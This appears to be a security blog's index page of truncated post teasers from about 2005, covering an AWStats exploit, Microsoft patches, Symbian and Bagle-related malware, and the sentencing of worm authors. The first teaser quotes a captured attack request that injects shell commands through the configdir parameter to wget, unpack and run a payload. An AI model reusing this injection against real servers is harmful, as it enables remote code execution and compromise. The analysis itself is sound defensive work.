We have received a packet which contains an exploit for theawstat vulnerability.The exploit is pretty straight forward.GET /awstats/awstats.pl?configdir=|echo%{blocked};cd%20/tmp;wget%{blocked}ice;tar%20zxvf%20ice;rm%20-rf%20ice;cd%20.x;./httpd;a;echo%20;echo| HTTP/1.1As highlighted above, it is pretty clear that the vulnerability in the packet was meant to download a file named ice using wget.The file ice is actually a gzipped file. This is just another compression tool like…

Microsoft has released 9 Microsoft Vulnerabilities this week. Three of which are critical, four are ranked as important and 2 as moderate.Critical MS05-050 Vulnerability in DirectShow Could Allow Remote Code Execution (904706) MS05-051 Vulnerabilities in MSDTC and COM+ Could Allow Remote Code Execution (902400) MS05-052 Cumulative Security Update for Internet Explorer (896688)Important MS05-046 Vulnerability in…

There is a new Symbian malware that has been found to be a trojanized version of a Symbian application called InstantSis. InstantSis is created by Biscompute and has the capability of transferring software from mobile phone to another mobile phone or to a PC. This Symbian trojan is the first of its kind because it…

Two men were finally sentenced to prison for conspiring to create a computer worm for an international hacking group. Bradley and Harvey were arrested in February 2003 at the same time as the 21-year-old American Raymond Stegerwalt. Stegerwalt was sentenced to 21 months in jail and fined $12,000 by the US Department of Defense, for…

We found an interesting bagle-related site that installs a Trojan, detected as TROJ_AGENT.ABT, which downloads and executeBKDR_VIPGSM.C. BKDR_VIPGSM interests us since it is speculated to be related to the Bagle and only one group made these malwares. Furthermore, BKDR_VIPGSM.C drops and executes a file detected as WORM_BAGLE.GEN. (hmmm interesting) However, upon further investigation, the file…